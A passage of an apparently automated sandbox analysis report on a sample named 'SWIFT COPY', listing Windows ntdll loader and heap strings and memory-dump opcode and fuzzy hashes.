                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0139A121
                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0139A10F
                                                                                              • LdrpCheckModule, xrefs: 0139A117
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-161242083
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-1334570610
                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013A82E8
                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 013A82DE
                                                                                              • Failed to reallocate the system dirs string !, xrefs: 013A82D7
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-1783798831
                                                                                              Strings
                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 013EC1C5
                                                                                              • @, xrefs: 013EC1F1
                                                                                              • PreferredUILanguages, xrefs: 013EC212
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                              • API String ID: 0-2968386058
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                              • API String ID: 0-1373925480
                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 013B4899
                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 013B4888
                                                                                              • LdrpCheckRedirection, xrefs: 013B488F
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                              • API String ID: 0-3154609507
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-2558761708
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: #%u
                                                                                              • API String ID: 48624451-232158463
                                                                                              Strings
                                                                                              • LdrResSearchResource Exit, xrefs: 0133AA25
                                                                                              • LdrResSearchResource Enter, xrefs: 0133AA13
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                              • API String ID: 0-4066393604
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `$`
                                                                                              • API String ID: 0-197956300
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: Legacy$UEFI
                                                                                              • API String ID: 2994545307-634100481
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$MUI
                                                                                              • API String ID: 0-17815947
                                                                                              Strings
                                                                                              • kLsE, xrefs: 01330540
                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0133063D
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                              • API String ID: 0-2547482624
                                                                                              Strings
                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0133A309
                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0133A2FB
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                              • API String ID: 0-2876891731
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                              • API String ID: 2994545307-4008356553
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: MUI
                                                                                              • API String ID: 0-1339004836
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: GlobalTags
                                                                                              • API String ID: 0-1106856819
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .mui
                                                                                              • API String ID: 0-1199573805
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: EXT-
                                                                                              • API String ID: 0-1948896318
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: BinaryHash
                                                                                              • API String ID: 0-2202222882
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #
                                                                                              • API String ID: 0-1885708031
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: BinaryName
                                                                                              • API String ID: 0-215506332
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `,
                                                                                              • API String ID: 0-3251075597
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `,
                                                                                              • API String ID: 0-3251075597
                                                                                              Strings
                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 013B895E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                              • API String ID: 0-702105204
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8539e5570d2acd518ed92682cc0080e0036dd48255819cc8de3a521e7dba83fa
                                                                                              • Instruction ID: 3f0032110b6203a2ed0993af669dc488f910581fd7b3af2d4315a0e95b80e84d
                                                                                              • Opcode Fuzzy Hash: 8539e5570d2acd518ed92682cc0080e0036dd48255819cc8de3a521e7dba83fa
                                                                                              • Instruction Fuzzy Hash: 7F912531A00626CBEB24DB6DC844B7EBBE5FF9471CF0540A9ED05AB750E638E941CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                              • Instruction ID: e48f1a7a5b7935089d7e933c34017141c22ef3280178d82c9c917d36d89ee96b
                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                              • Instruction Fuzzy Hash: 80816131A002099BDF19DF98C490AAEBBF6AF84318F14856DDA199B385D734E901CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2829e3162754fb707c8252428ed288819c53bea8c5177b97f358f509453061f2
                                                                                              • Instruction ID: 689a59f7432d0052d7ceda9319dc9a034aa37742f6ce5549c40f44c51e345585
                                                                                              • Opcode Fuzzy Hash: 2829e3162754fb707c8252428ed288819c53bea8c5177b97f358f509453061f2
                                                                                              • Instruction Fuzzy Hash: C1814075900609EFDB25DFA9C880BEEBBFAFF48358F108429E555A7254D730AC49CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fa291da21d975e4b1f99fd014e8adf42ea5e575e6d8add34256ac2f8dc646667
                                                                                              • Instruction ID: b69f6bd753dd92f388f13b2c1d37c01b1884470eb24b5720f3bb1ed17c351e25
                                                                                              • Opcode Fuzzy Hash: fa291da21d975e4b1f99fd014e8adf42ea5e575e6d8add34256ac2f8dc646667
                                                                                              • Instruction Fuzzy Hash: 6571BB75D062699FCB25CF58C8907BEBBF5FF99718F14415AE842AB350D734A840CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 581b6ed4254305adef10c9a77f1e5afd31a57aaea2f49ba225a821ef803b45af
                                                                                              • Instruction ID: 8960cfdeba1d2e7abe0697d2c607b4ca92cbbf40ed463fcd8abd7849ee6a7343
                                                                                              • Opcode Fuzzy Hash: 581b6ed4254305adef10c9a77f1e5afd31a57aaea2f49ba225a821ef803b45af
                                                                                              • Instruction Fuzzy Hash: A671C570900319DFEB30DF59D948A9ABBF8FF98318F41415AEA14E72A8C7359981CB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e65c1324c78faa0b4968a16273cf062b14f34eec4898b8ce338aba36f174b6de
                                                                                              • Instruction ID: 56251a281ca38847df1ae180b7bf9837cda78fa1eb88f4e1485a8c52959ee506
                                                                                              • Opcode Fuzzy Hash: e65c1324c78faa0b4968a16273cf062b14f34eec4898b8ce338aba36f174b6de
                                                                                              • Instruction Fuzzy Hash: C071DF716046428FD311DF2CD480B2BBBE5FF84318F0585AAF8989B352DB78E845CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                              • Instruction ID: 7961f00e69a4bab8d5d9a29d6b56540bca55463a90130b1b698b7e3194bf38ad
                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                              • Instruction Fuzzy Hash: C4716D71E0061AEFDB14DFA9C984ADEBBF8FF88704F104569E605A7650EB34EA41CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7e35f80fdf14cc48d807b67d5d9f631980b62dcd2dfee1abfc8b311fc8113122
                                                                                              • Instruction ID: 72c0a2100bede9c7dcb72a7c7f17575947f6ec5861b136c0ece400c83f621f95
                                                                                              • Opcode Fuzzy Hash: 7e35f80fdf14cc48d807b67d5d9f631980b62dcd2dfee1abfc8b311fc8113122
                                                                                              • Instruction Fuzzy Hash: DD71F3B2200701AFEB329F18C846F6ABBE6EF40B28F15441CE2559B7A1D775ED44CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9bb4264aa04fbce18cbb1562acab71d77974533c17a843a8deb96c08bf6b4d8a
                                                                                              • Instruction ID: 402e6aab785b9cdaf826d1eac0e6144c38293a81107ce1ab576a5d04a5dd4f9d
                                                                                              • Opcode Fuzzy Hash: 9bb4264aa04fbce18cbb1562acab71d77974533c17a843a8deb96c08bf6b4d8a
                                                                                              • Instruction Fuzzy Hash: 3381D471A047469FDF28CF5CD484B6EBBB5FF88318F5A4269E9006B691C7349D80CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ae20cdbdcdf8ee6f2ee02604e4ad452b54f892b2ee5fcf67a45f20333567be57
                                                                                              • Instruction ID: 3fc95735d96641e292ab261a23d6f4458455912b200b3895605e31d2644e27b2
                                                                                              • Opcode Fuzzy Hash: ae20cdbdcdf8ee6f2ee02604e4ad452b54f892b2ee5fcf67a45f20333567be57
                                                                                              • Instruction Fuzzy Hash: A9711971E0060AAFDF16DF95C941FEEBBB8FB14354F10412AE624A62A0D775AA05CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d32db01a11cf361d4da090d6e6736ae96366bbb5fd778d43c8fe346aef2244f7
                                                                                              • Instruction ID: 576d1d46c0b4f6c84e94cbc5ce2c7f3cb59664d5b302a46f28d9ffa082c388e8
                                                                                              • Opcode Fuzzy Hash: d32db01a11cf361d4da090d6e6736ae96366bbb5fd778d43c8fe346aef2244f7
                                                                                              • Instruction Fuzzy Hash: C651B472504722AFD722DE68C848E5BB7ECEBC5758F014529BA40EB290D774ED04CBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e4a4aa9a9f238f15857210a7facb8585f329bb51c00dbca8472f2448788fe662
                                                                                              • Instruction ID: 1cbdd8ba7d389136629853b112820d13ec959a202f63ca47963b4ae61f97cbbe
                                                                                              • Opcode Fuzzy Hash: e4a4aa9a9f238f15857210a7facb8585f329bb51c00dbca8472f2448788fe662
                                                                                              • Instruction Fuzzy Hash: 2951DE71900709DFD720CF5AD880AABFBF8BF54718F10465EE296A76A0C7B0B545CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab9dca1f5bcff12c01fc650fbc6587c2d977a59cde1b80d0451fdf95f11fbd9e
                                                                                              • Instruction ID: 51b4d8d604fddea2bff1acd574b70305d59483c68832846cf5e361c7218099e9
                                                                                              • Opcode Fuzzy Hash: ab9dca1f5bcff12c01fc650fbc6587c2d977a59cde1b80d0451fdf95f11fbd9e
                                                                                              • Instruction Fuzzy Hash: 03513875200A19DFCB22EFA9C980F6AB7FDFB14648F40446AE64197660E734FD44CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 680c0f42d6e9d7173179c61395abca49b55e07480d111d2656afa494dea2910f
                                                                                              • Instruction ID: 37c1c0ae24f64785cd6e633988a2e449a4f5a4b57deb305ccb50711316389064
                                                                                              • Opcode Fuzzy Hash: 680c0f42d6e9d7173179c61395abca49b55e07480d111d2656afa494dea2910f
                                                                                              • Instruction Fuzzy Hash: DA5176726083068FD754DF2DE880A6BBBE5BFC8208F44492DF589C7650EB30E915CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                              • Instruction ID: 5082aac60d86d026ed588fabaf9861a462a0df292897649117dd371e165ba454
                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                              • Instruction Fuzzy Hash: A5518371D0021A9BDF59DF98D440FEEBBB5AF45B58F044069EE11AB240E734ED84CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                              • Instruction ID: 815394d6b6633dc6cbab9426f57e76873bef727a6bdf54563877fd46c1b0bfa5
                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                              • Instruction Fuzzy Hash: A0518431D0421AEBEF21DA9CC8D4BEEBBB9AF4032CF154679D71267590E7749E4087A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d2b3f6b5fb4a055ad76e14e487c4b6d19bcc49662e31a477bc3cd004649ec216
                                                                                              • Instruction ID: b52385479af31be344a1dd6c6c5e576ee3995e38ec4709638e277ce6fd5a1f80
                                                                                              • Opcode Fuzzy Hash: d2b3f6b5fb4a055ad76e14e487c4b6d19bcc49662e31a477bc3cd004649ec216
                                                                                              • Instruction Fuzzy Hash: 7C41D2726046469BC324DF6CC880BABB7F5FFC8704F140619FA9497A90E730E904C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7098648d3f99e55f95432e702bf23e49978c9e1b85d0e0c7d4b11269ba1f9707
                                                                                              • Instruction ID: 3a58c062ec816cb02c297b7c3035ace886f44dee7645d77ee3c7024089c7670f
                                                                                              • Opcode Fuzzy Hash: 7098648d3f99e55f95432e702bf23e49978c9e1b85d0e0c7d4b11269ba1f9707
                                                                                              • Instruction Fuzzy Hash: 6C41B1302003068FDB25DF2CD884B2ABBE9EFC0368F14446DEA458B2A1DB34D941CB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33be6c0473419bb510702ab001840f104963738d21ee1f3acba76149947a5eb2
                                                                                              • Instruction ID: f4df08ea1db84fd3b0a310d4457ecd8937218101542d592bd5af07db68fc666c
                                                                                              • Opcode Fuzzy Hash: 33be6c0473419bb510702ab001840f104963738d21ee1f3acba76149947a5eb2
                                                                                              • Instruction Fuzzy Hash: A4419271A01629CFCF15EF6DC98099DFBF1FF98328B2085AED466A7290D734A901CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                              • Instruction ID: bedceeb708749b24d267882218f2a817949e06fd4c965f126dc3b5c340bfffcb
                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                              • Instruction Fuzzy Hash: A9312731A04244AFDB219B6CCC40BDFBFE8AF14758F048565F855D7352C274A884CBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dfd86d4c91e01d299720c08c55f924c419461b740be212c9cd078344d08a1cfa
                                                                                              • Instruction ID: cd1add5f7af7f1ae9211dab32b10707dbd3104dc67a7857e93e1e8dd24fbfa74
                                                                                              • Opcode Fuzzy Hash: dfd86d4c91e01d299720c08c55f924c419461b740be212c9cd078344d08a1cfa
                                                                                              • Instruction Fuzzy Hash: 00318A35740716ABD732AF599C41FAB7AB9EB58B58F000038FA04BF291DA64DC00C790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4738a268907ea17cd5b66137c6299b42717cee7db687a95a12295754fee07cf2
                                                                                              • Instruction ID: 30cc04a7106c1cf0a5c31a88c4f613358daec822b5ae13b47baf3135085522d0
                                                                                              • Opcode Fuzzy Hash: 4738a268907ea17cd5b66137c6299b42717cee7db687a95a12295754fee07cf2
                                                                                              • Instruction Fuzzy Hash: 3131E5322053219FC731DF1DD884E56B7E5FB88368F46446DE999DB291D730E851CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 70f0affbfac80aa12db53460a6135ef4fd86a5b3410c507c2a072eacf49f8bfb
                                                                                              • Instruction ID: 45eb89ac6f5846a3989dbc8c6b8f8416e69efcd4dde11bfa481849525c4ca9c5
                                                                                              • Opcode Fuzzy Hash: 70f0affbfac80aa12db53460a6135ef4fd86a5b3410c507c2a072eacf49f8bfb
                                                                                              • Instruction Fuzzy Hash: DE419F31200B45DFDB26CF28C981BD67BE9AF55318F05446DFA998B650C774E844CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 98677844f42684ea05414b52d7051633257a5fd4d8ccce6bd19f05f2a6fbfa78
                                                                                              • Instruction ID: 405865a159b36e9853ecfeed184a02334d8305a4dc7cb9e7c8cc454bf968fde1
                                                                                              • Opcode Fuzzy Hash: 98677844f42684ea05414b52d7051633257a5fd4d8ccce6bd19f05f2a6fbfa78
                                                                                              • Instruction Fuzzy Hash: B931BC31204311AFDB20DF28C884A2AB7E5FB88728F06456DF999DB390E730E851CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab6f5e4d4afad06dfea02d4cdeb3c8b6c507bf7cd6f47fbd0bd57030eb6469e6
                                                                                              • Instruction ID: a37489b14a7765c8241f83a9a9cd142aae882691295b2ace360b49a1b6f8560e
                                                                                              • Opcode Fuzzy Hash: ab6f5e4d4afad06dfea02d4cdeb3c8b6c507bf7cd6f47fbd0bd57030eb6469e6
                                                                                              • Instruction Fuzzy Hash: F531C4322496969BF726579CC95CB657BD8FB41B4CF5D00B0EB869BAD1DB28D840C230
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a6c7d3413edd5fc98167e6d02a11d711f192e9cef5dda3a092dc32212f7e1677
                                                                                              • Instruction ID: 2e2c31e330b7bf8c13e19ca19035dc9fd6e0e5405013af139ae159b53cad3e10
                                                                                              • Opcode Fuzzy Hash: a6c7d3413edd5fc98167e6d02a11d711f192e9cef5dda3a092dc32212f7e1677
                                                                                              • Instruction Fuzzy Hash: 3631D2BAA0011AFBDB25DF98CC81BAEB7B5FB44744F454169EA00AB244D770AD40CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6d3c65e4ac78535440181e2e2b71f0f1bdba5851287ce9644b1df5eea91cc94b
                                                                                              • Instruction ID: f6047341d82b53b519e0b6f5828c7403515c4df0255a2e7f840094e79adc6231
                                                                                              • Opcode Fuzzy Hash: 6d3c65e4ac78535440181e2e2b71f0f1bdba5851287ce9644b1df5eea91cc94b
                                                                                              • Instruction Fuzzy Hash: 46317336A4012DABCF21DF59DC84BDE7BF5AB98314F1001E5E508A7250CA309E918F90
                                                                                              Memory Dump Source
